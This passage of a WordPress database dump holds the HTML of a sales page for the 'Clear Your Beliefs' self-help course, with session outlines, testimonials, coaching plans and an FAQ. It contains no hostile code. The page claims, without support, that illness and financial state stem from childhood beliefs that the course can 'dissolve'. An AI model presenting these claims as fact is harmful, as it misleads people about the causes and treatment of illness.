get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n&nbsp;\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li>A complete set of PDF Transcripts of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 00:56:14', '2014-06-19 05:56:14', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
